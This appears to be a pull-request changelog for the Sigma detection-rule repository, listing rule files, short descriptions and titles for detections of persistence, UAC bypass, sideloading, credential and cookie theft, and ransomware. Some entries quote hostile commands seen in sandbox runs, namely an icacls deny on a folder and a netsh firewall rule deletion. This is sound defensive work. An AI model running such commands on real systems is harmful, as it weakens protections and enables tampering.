According to the query in reference, computer accounts should be excluded: "**and not (SourceUserName IMATCHES '.*\$')**"
=> Add FP from reference link

rules/windows/network_connection/net_connection_win_susps_epmap.yml
Detect RPC tools like TaskShell
=> RPC epmap tools

rules/windows/builtin/security/win_scheduled_task_once_0000.yml, rules/windows/dns_query/dns_query_win_anonymfiles_com.yml
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte
=> blackbyte rules

rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml
Start internal Virtual machine for 16bit application
=> Add proc_creation_win_susp_16bit_application

rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml
C:\Windows\system32\csrstub.exe
File information
Company: Microsoft Corporation
Description: allows lua to launch 16-bit applications
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
=> Add csrstub.exe

rules/windows/file_rename/file_rename_win_ransomware.yml
Detect Ransomware action when it start to change all the file 
example C:\Users\admin\Desktop\aroundless.rtf.CHAOS
=> Add file_rename_win_ransomware

rules/windows/file_event/file_event_win_wpbbin_persistence.yml, rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml
This PR covers the persistence method described here https://persistence-info.github.io/Data/wpbbin.html and here https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c by adding 2 new rules
- e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f - Checks for existence of the binary
- 4abc0ec4-db5a-412f-9632-26659cddf145 - Checks for execution of the binary
=> UEFI Persistence - wpbbin

rules/windows/image_load/image_load_susp_dll_load_system_process.yml, rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
PR add two new Rules 
- 9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c - Generic rule that detects loading of DLLs from susp locations
- 9ed5959a-c43c-4c59-84e3-d28628429456 - Iscsicpl UAC Bypass
=> Iscsicpl UAC Bypass + Generic Rule

rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml
@Corissalea  Sorry Not found the trouble in the yaml 
close #3250
=> Add azure_aad_secops_new_ca_policy_addedby_bad_actor

rules/windows/registry/registry_set/registry_set_fax_change_service_user.yml, rules/windows/registry/registry_set/registry_set_fax_dll_persistance.yml
ref: https://twitter.com/dottor_morte/status/1544652325570191361
Thanks [@dottor_morte](https://twitter.com/dottor_morte) for slides
Only the "WHAT THE FAX" section
=> Fax service persistance

rules/windows/process_creation/proc_creation_win_icacls_deny.yml
in https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/
found this : `icacls "C:\Users\admin\AppData\Local\37f92fe8-bcf0-4ee0-b8ba-561f797f5696" /deny *S-1-1-0:(OI)(CI)(DE,DC)`
=> Add proc_creation_win_icacls_deny

rules/windows/builtin/system/win_service_install_pdqdeploy.yml, rules/windows/builtin/system/win_service_install_pdqdeploy_runner.yml, rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml
New sigma rules covering PDQDeploy based on the following series of tweets https://twitter.com/malmoeb/status/1550483085472432128
- New PDQDeploy Service - Server Side (ee9ca27c-9bd7-4cee-9b01-6e906be7cae3)
- New PDQDeploy Service - Client Side (b98a10af-1e1e-44a7-bab2-4cc026917648)
- Suspicious Execution Of PDQDeployRunner (12b8e9f5-96b2-41e1-9a42-8c6779a5c184)
=> PDQDeploy Rules

rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml
Rule to detect susp processes spawning from WindowsTerminal based on this tweet https://twitter.com/nas_bench/status/1550836225652686848
=> WindowsTerminal Rule

rules/linux/process_creation/proc_creation_lnx_base64_execution.yml, rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
src: https://github.com/arget13/DDexec
=> new rules: lnx susp shell exec

rules/windows/process_creation/proc_creation_win_webshell_spawn.yml
Example:
```
2022-07-25 18:28:07 REDACTED Sysmon: 1: Process Create | RuleName=technique_id=T1059,technique_name=Command-Line Interface | UtcTime=2022-07-25 18:28:07.302 | ProcessGuid={a79e0ea8-e0b7-62de-0601-00000000f300} | ProcessId=1840 | Image=C:\Windows\System32\cmd.exe | FileVersion=10.0.17763.1697 (WinBuild.160101.0800) | Description=Windows Command Processor | Company=Microsoft Corporation | OriginalFileName=Cmd.Exe | OriginalCommandLine=C:\Windows\system32\cmd.exe /c ""C:\ManageEngine\ADManager Plus\ES\bin\elasticsearch.bat" -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" | CommandLine=C:\Windows\system32\cmd.exe /c C:\ManageEngine\ADManager "Plus\ES\bin\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt" | CurrentDirectory=C:\ManageEngine\ADManager Plus\ES\bin\ | …
```
=> False positive when running Manage Engine and elastic

rules/windows/file_access/file_access_win_browser_credential_stealing.yml
=> file_access_win_browser_credential_stealing FP

rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml
View this https://twitter.com/Dinosn/status/1552330428878577664 and start to try https://github.com/rootm0s/WinPwnage
=> Persistence appx

rules/windows/process_creation/proc_creation_win_schtasks_system.yml, rules/windows/process_creation/proc_creation_win_susp_schtasks_change.yml
New rules inspired by this report https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern
=> Qbot rules

rules/windows/file_event/file_event_win_susp_double_extension.yml
Suspicious Double Extension Files
=> Add file_event_win_susp_double_extension

rules/windows/process_creation/proc_creation_win_chrome_remote_debugging.yml
src: https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf
=> new rule: browser remote debugging

rules/windows/file_event/file_event_win_dll_sideloading_space_path.yml
Very basic rule but should do the job
=> Sideloading DLL with space path

rules/windows/sysmon/sysmon_config_modification_status.yml
=> Add Filter sysmon start

rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml
This fixes my tooling and might avoid a problem in the future.
=> chore: fix case on author for consistency

rules/linux/network_connection/net_connection_github_myjino_ru.yml, rules/network/dns/net_dns_github_myjino_ru.yml, rules/windows/network_connection/net_connection_win_github_myjino_ru.yml, rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml
https://twitter.com/stephenlacy/status/1554697077430505473?s=20&t=nPmspxUe6162gA55VJzh-Q
=> rule: myjino github repo compromise

rules/windows/builtin/security/win_susp_logon_explicit_credentials.yml
Example:
```
2022-08-03 12:22:15 REDACTED Security-Auditing: 4648: A logon was attempted using explicit credentials. | SubjectUserSid=S-1-5-18 | SubjectUserName=REDACTED$ | SubjectDomainName=REDACTEDDOMAIN | SubjectLogonId=0x3e7 | LogonGuid={00000000-0000-0000-0000-000000000000} | TargetUserName=REDACTED$ | TargetDomainName=REDACTEDDOMAIN.COM | TargetLogonGuid={508FA8ED-EF51-3F45-5BE5-E90CF024607A} | TargetServerName=REDACTED$ | TargetInfo=REDACTED$ | ProcessId=0x47dc | ProcessName=C:\Windows\System32\taskhostw.exe | IpAddress=- | IpPort=- | pid=756 | level=29 | sys_version=0 | category=Logon | op=Info | Security=true | key=0x8020000000000000 | id=901583674 | app="C:\Windows\System32\lsass.exe" | tid=9652 | channel="Security" | type=audit success(0) | 
```
=> Ignore workstations/system execution.  Normal behavior for scheduled tasks

tools/config/mitre/groups.json, tools/config/mitre/software.json, tools/config/mitre/tactics.json, tools/config/mitre/techniques.json
=> mitre_update: updates resulting json to current state

rules/windows/process_creation/proc_creation_win_ntfs_short_name_use.yml
Detect when use short name 8+3 to bypass sigma rule detection
=> Add proc_creation_win_shortname_use.yml

rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml
Just play a little with https://github.com/last-byte/PersistenceSniper in my test VM
=> Add registry_set_dbgmanageddebugger_persistence.yml

rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml, rules/windows/network_connection/net_connection_win_remote_powershell_session_network.yml, rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml
the changed files seem like they used an esacped * by mistake
=> fix: use wildcard * instead of plaintext *

.github/workflows/known-FPs.csv, rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_use.yml
https://twitter.com/frack113/status/1555830623633375232
=> Use short name path

rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml
Small update due to the Twitter discussion about the Ntfs short names (https://twitter.com/jonasLyk/status/1555914501802921984)
=> Update Ntfs Short Name rule

rules/windows/builtin/security/win_account_backdoor_dcsync_rights.yml, rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml, tools/sigma/sigmac.py
close #3337
close #3339 
close #3342
=> Fix some issues

rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml
=> Fix FP - Short Path Rules

rules/windows/file_change/file_change_win_2022_timestomping.yml
First try of file_change rule.
It is very basic
=> Timestomping file_change  rule

rules/windows/file_event/file_event_win_iphlpapi_dll_sideloading.yml, rules/windows/file_rename/file_rename_win_ransomware.yml
Read some article on https://blog.cyble.com/
=> Cyble blog

rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml
`netsh firewall delete allowedprogram "C:\Users\admin\AppData\Local\Temp\server.exe"`
=> Netsh Delete

rules/windows/sysmon/sysmon_file_block_exe.yml, tools/config/fortisiem-windows.yml, tools/config/generic/sysmon.yml, tools/config/hawk.yml, tools/config/thor.yml
- Add new Sysmon EID and update the Sysmon config
- Add a new generic rule to detect the new event
=> Update Sysmon Config

rules/web/web_cve_2022_27925_exploit.yml
Fixing case on author for consistency with other rules
=> Fix case on author for consistency

rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml, rules/windows/process_creation/proc_creation_modify_group_policy_settings.yml, rules/windows/process_creation/proc_creation_win_susp_reg_add.yml, rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml, rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml, rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml, rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml, rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml
Long time I did not run aurora vs redcannary atomic-red-team
=> Redcannary test

rules/windows/builtin/security/win_sysmon_channel_reference_deletion.yml, rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml, rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml, rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml, rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml, rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml, rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml, rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml, rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml, rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml, rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml, rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml, rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml, rules/windows/process_creation/proc_creation_win_mshta_http.yml, rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml, rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml, rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml, rules/windows/process_creation/proc_creation_win_susp_instalutil.yml, rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml
I added and updated a bunch of LOLBINs and updated some minor indentation for some rules
=> LOLBIN Updates

rules/windows/dns_query/dns_query_win_susp_ldap.yml, rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml, rules/windows/process_creation/proc_creation_win_dirlister.yml, rules/windows/process_creation/proc_creation_win_trufflesnout.yml, rules/windows/process_creation/proc_creation_win_webbrowserpassview.yml, rules/windows/registry/registry_set/registry_set_add_hidden_user.yml
=> Redcannary 20220820

rules/windows/file_event/file_event_legitimate_app_dropping_archive.yml, rules/windows/file_event/file_event_legitimate_app_dropping_exe.yml, rules/windows/file_event/file_event_legitimate_app_dropping_script.yml, rules/windows/file_event/file_event_proxy_dropping_executable.yml
from https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
=> Add file_event_proxy_dropping_executable

rules/windows/process_creation/proc_creation_win_schtasks_system.yml
=> Revert "Fixing selection_user to match NT AUTHORITY\SYSTEM"

rules/windows/network_connection/net_connection_win_script.yml, rules/windows/network_connection/net_connection_win_script_wan.yml, rules/windows/process_creation/proc_creation_win_nimgrab.yml, rules/windows/registry/registry_set/registry_set_treatas_persistence.yml
Some redcannary tests without good  sigma detection
=> Redcannary 20220828

rules/windows/builtin/application/win_mssql_disable_audit_settings.yml, rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml, rules/windows/builtin/system/win_service_install_pdqdeploy_runner.yml, rules/windows/builtin/system/win_system_application_sysmon_crash.yml, rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml, rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml, rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml, rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml, rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml, rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml, rules/windows/process_creation/proc_creation_win_dll_sideload_defender.yml, rules/windows/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml, rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml, rules/windows/process_creation/proc_creation_win_icacls_deny.yml, rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml, rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml, rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml, rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml, rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml, rules/windows/process_creation/proc_creation_win_lolbin_winword.yml, rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml, rules/windows/process_creation/proc_creation_win_net_user_add_never_expire.yml, rules/windows/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml, rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml, rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml, rules/windows/process_creation/proc_creation_win_susp_nmap.yml, rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml, rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml, rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml
Fix a lot of typos in rules text and comments
=> Fix a lot of typos in rules text and comments

rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml, rules/cloud/azure/azure_ad_auth_sucess_increase.yml, rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml, rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml, rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml, rules/cloud/azure/azure_app_appid_uri_changes.yml, rules/cloud/azure/azure_app_credential_added.yml, rules/cloud/azure/azure_app_uri_modifications.yml, rules/cloud/azure/azure_mfa_interrupted.yml, rules/cloud/azure/azure_privileged_account_creation.yml, rules/cloud/onelogin/onelogin_user_account_locked.yml, rules/linux/auditd/lnx_auditd_bpfdoor_port_redirect.yml, rules/linux/auditd/lnx_auditd_capabilities_discovery.yml, rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml, rules/web/web_cve_2014_6287_hfs_rce.yml, rules/web/web_iis_tilt_shortname_scan.yml, rules/windows/builtin/application/win_mssql_add_sysadmin_account.yml, rules/windows/builtin/application/win_mssql_sp_procoption_set.yml, rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml, rules/windows/builtin/security/win_adcs_certificate_template_configuration_vulnerability.yml, rules/windows/builtin/security/win_adcs_certificate_template_configuration_vulnerability_eku.yml, rules/windows/process_creation/proc_creation_win_susp_nmap.yml, rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml
I think this is the end... for now. :)
=> Fix a lot of typos in rules text and comments #Part 3

rules/windows/process_creation/proc_creation_win_susp_net_use.yml
https://twitter.com/ShadowChasing1/status/1552595370961944576
=> new rule: susp net use combo

rules/windows/process_creation/proc_creation_win_frp.yml
=> Add proc_creation_win_frp

rules/windows/network_connection/net_connection_win_certutil.yml
As there mamy rule to dectect CommandLine when certutil download a file , I make one generic to detect network connection.
Focus on : 
- http 
- https
- rpc
- smb
=> Certutil network connection

rules/windows/file_event/file_event_win_susp_executable_creation.yml
Strange executable creation view on any.run
=> Add file_event_win_susp_executable_creation

rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml
Rule add: nslookup pwsh download cradle
=> rule add: nslookup pwsh download cradle

Pipfile, tools/sigma/sigmac.py
Modified Pipfile to add depency to termcolor.
But i don't have a clue what to do with the Pipfile.lock content or how to generate it.
Did that because a colleague used sigmac but did not read the warning in the README
=> Added deprecating warning in sigmac with color

rules/windows/file_change/file_change_win_2022_timestomping.yml
This reverts commit 6c1761a7b742cd7fcbde5dc2cfd92db6ebefe062.
@frack113: This restores the state before the erroneous revert.
=> Revert "Revert "Merge branch 'master' of github.com:elhoim/sigma""

rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml, rules/windows/powershell/powershell_script/posh_ps_enable_windowsoptionalfeature.yml
=> Add posh_ps_disable_windowsoptionalfeature

rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml, rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml, rules/windows/registry/registry_set/registry_set_taskcache_entry.yml, tests/check-baseline-local.sh
some minor changes on the topics above
=> FP Tuning / Local Test Script / Rule Refactor

rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml
Ref : https://twitter.com/malmoeb/status/1570814999370801158
=> Add posh_ps_sensitive_file_discovery

tools/sigma/backends/lacework.py
1. This adds support for `linux.network_connection` by adding a selfJoinFilter for process name (image)
2. Adds support for multiple sources (i.e. `array_to_rows()`)
3. Removes references to retired `evaluatorId`
=> feat(backend): add support for linux.network_connection

rules/windows/builtin/application/win_builtin_remove_application.yml
Some English fixes. Also, the alert level should probably be informational instead of low?
This event can be quite noisy in my experience.
=> update application uninstalled rule

rules/windows/process_creation/proc_creation_win_netsupport.yml, rules/windows/process_creation/proc_creation_win_ultraviewer.yml, rules/windows/process_creation/proc_creation_win_w32tm.yml
=> Add redcannary rules

rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml
=> Add registry_set_change_winevt_channelaccess

rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml
fixing https://github.com/SigmaHQ/sigma/issues/3536
=> fix: filter definition in userinit rule

README.md
Based on line 3 where it mentions being inside of `./tools` directory, updating line 4 to include working example that I used
=> Update README for rule usage section

rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml
https://github.com/SigmaHQ/sigma/issues/3556
=> fix: wrong condition in whoami rule

rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml
=> Issue 3552

rules/windows/builtin/security/win_hybridconnectionmgr_svc_installation.yml, rules/windows/builtin/security/win_invoke_obfuscation_clip_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_obfuscated_iex_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_stdin_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_var_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_compress_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_rundll_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_stdin_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_use_clip_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_use_mshta_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_use_rundll32_services_security.yml, rules/windows/builtin/security/win_invoke_obfuscation_via_var_services_security.yml, rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml, rules/windows/builtin/security/win_security_mal_creddumper.yml, rules/windows/builtin/security/win_security_mal_service_installs.yml, rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml, rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml, rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml, rules/windows/builtin/security/win_security_tap_driver_installation.yml, rules/windows/builtin/system/win_pcap_drivers.yml, rules/windows/driver_load/driver_load_vuln_drivers.yml, rules/windows/driver_load/driver_load_vuln_drivers_names.yml, rules/windows/process_creation/proc_creation_win_apt_wocao.yml
- Added missing definition for event 4697
- Add missing backslashes to the driver rule
- Add more malicious hashes and names
=> Rule Dev - Small Updates

rules/windows/file_rename/file_rename_win_not_dll_to_dll.yml, rules/windows/file_rename/file_rename_win_ransomware.yml
Add definition for file_rename as it is not a sysmon event
=> Add definition for file_rename

.github/workflows/known-FPs.csv, rules/windows/builtin/application/win_msi_install_from_susp_locations.yml, rules/windows/builtin/system/win_susp_service_installation_folder.yml, rules/windows/image_load/image_load_susp_dll_load_system_process.yml, rules/windows/process_creation/proc_creation_win_lolbin_bash.yml, rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml, tests/check-baseline-local.sh, tests/test_rules.py, tools/config/thor.yml
=> FP fixes and minor QA

rules/windows/builtin/application/win_mssql_sp_maggie.yml
Reference https://medium.com/@DCSO_CyTec/tracking-down-maggie-4d889872513d
=> MSSQL stored procedure - maggie

rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml
Get-ADUser Detection is User Discovery. Corrected the MITRE Id.
=> changed mitre id from process to user discovery

rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml
rename posh_ps_copy_item_system32.yml to posh_ps_copy_item_system_directory.yml
=> Update and rename posh_ps_copy_item_system32.yml 

.github/workflows/known-FPs.csv, rules/proxy/proxy_ua_susp.yml, rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml, rules/windows/image_load/image_load_abusing_azure_browser_sso.yml, rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml, rules/windows/registry/registry_set/registry_set_taskcache_entry.yml, tests/test_rules.py
resolves issue 3618, enhances sigma rule tests and fixes new found typos/FPs found in testing
=> Fix Testing/Rules

rules/windows/builtin/application/win_msi_install_from_web.yml, rules/windows/process_creation/proc_creation_win_msiexec_dll.yml, rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml, rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml
Update on msiexec sigma rules based on:
https://twitter.com/_st0pp3r_/status/1583914244344799235.
Kindly review and merge if you think it adds value.
=> Msiexec update in sigma rules

rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml, rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml, rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml, rules/windows/file/file_access/file_access_win_susp_cred_hist_access.yml
=> Add logsource definition

rules-deprecated/windows/proc_creation_win_possible_applocker_bypass.yml, rules-deprecated/windows/proc_creation_win_susp_run_folder.yml, rules/windows/file/file_event/file_event_win_susp_dropper.yml, rules/windows/network_connection/net_connection_win_excel_outbound_network_connection.yml, rules/windows/network_connection/net_connection_win_susp_rdp.yml, rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml, rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml, rules/windows/process_access/proc_access_win_in_memory_assembly_execution.yml, rules/windows/process_creation/proc_creation_win_susp_run_folder.yml
This PR covers the following
- Fix FP found in testing
- Deprecate [dca91cfd-d7ab-4c66-8da7-ee57d487b35b]([dca91cfd-d7ab-4c66-8da7-ee57d487b35b](https://github.com/SigmaHQ/sigma/pull/3670/commits/d86c05643bef64bb06aa3b4c42c1f6daf6cab171))
- Deprecate [82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719](https://github.com/SigmaHQ/sigma/blob/1f8e37351e7c5d89ce7808391edaef34bd8db6c0/rules/windows/process_creation/proc_creation_win_possible_applocker_bypass.yml)
=> Aurora - Fix FP Found In Testing

rules/windows/builtin/security/win_security_access_token_abuse.yml
Closes https://github.com/SigmaHQ/sigma/issues/2964
=> Rule add: windows access token abuse

rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml, rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml, rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml, rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml
https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d
=> rule: KDC RC4-HMAC downgrade CVE-2022-37966

tests/test_rules.py
Tightening the MITRE tag check regex a little bit.
cc @phantinuss
=> feat: enhance mitre tag regex in sigma test

rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml, rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml, rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml, rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml, rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml, rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml, rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml, rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml, rules/windows/process_creation/proc_creation_win_apt_babyshark.yml, rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml, rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml, rules/windows/process_creation/proc_creation_win_attrib_hiding_files.yml, rules/windows/process_creation/proc_creation_win_attrib_system.yml, rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml, rules/windows/process_creation/proc_creation_win_automated_collection.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml, rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml, rules/windows/process_creation/proc_creation_win_bootconf_mod.yml, rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml, rules/windows/process_creation/proc_creation_win_cmd_redirect.yml, rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml, rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml, rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml, rules/windows/process_creation/proc_creation_win_control_panel_item.yml, rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml, rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
This PR is the first batch adding the missing `OriginalFileName` field to `process_creation` rules (where it make sens)
=> feat: add missing `OriginalFileName` field

rules/windows/process_creation/proc_creation_win_susp_msbuild.yml
Detects  'Msbuild.exe' run  by a uncommun parent
=> Add proc_creation_win_susp_msbuild

rules/windows/process_creation/proc_creation_win_susp_powercfg.yml
My first powercfg rule, should be specific enough to avoid FP
=> Add proc_creation_win_susp_powercfg

rules/windows/file/file_event/file_event_win_remote_cred_dump.yml, rules/windows/process_creation/proc_creation_win_mal_ryuk.yml
- causing trouble with some backends
=> fix: some rules using ??? placeholders

rules/windows/process_creation/proc_creation_win_susp_cmd.yml
LogonId is use to avoid valid case
=> Sysmoneop CMd shell

rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml
=> fix: FPs with Important Scheduled Task Deleted

rules/windows/process_creation/proc_creation_create_link_osk_cmd.yml, rules/windows/process_creation/proc_creation_wmic_tamper_defender.yml, rules/windows/registry/registry_event/registry_set_legalnotice_susp_message.yml
Long time I did not start my redcannary VM
=> Redcannary rules

rules/windows/image_load/image_load_side_load_classicexplorer32.yml
From https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets
=> Add image_load_side_load_classicexplorer32

rules/windows/process_creation/proc_creation_win_susp_image_missing.yml
Remove false positive from System built-in process.
=> Add System to list of built-in Windows processes with no extension

rules/windows/image_load/image_load_side_load_jsschhlp.yml
from https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/
get the path here http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp
=> Add image_load_side_load_jsschhlp

tools/config/winlogbeat-modules-enabled.yml
=> Space remove

rules/web/web_cve_2021_26084_confluence_rce_exploit.yml
Detects CVE-2021-260841 Confluence Server Webwork OGNL injection
=> Create CVE-2021-26084 detection

rules-unsupported/driver_load_invoke_obfuscation_via_rundll_services.yml, tests/test_rules.py
This PR adds a new test to look for duplicate rule titles across all rules.
=> feat: add duplicate titles test

rules/windows/process_creation/proc_creation_win_sqlite_chrome_cookies.yml, rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml
Update existing rule and add one new rule related to Steal Web Session Cookie technique (T1539)
=> T1539 Steal Web Session Cookie rules

rules/linux/auditd/lnx_auditd_create_account.yml
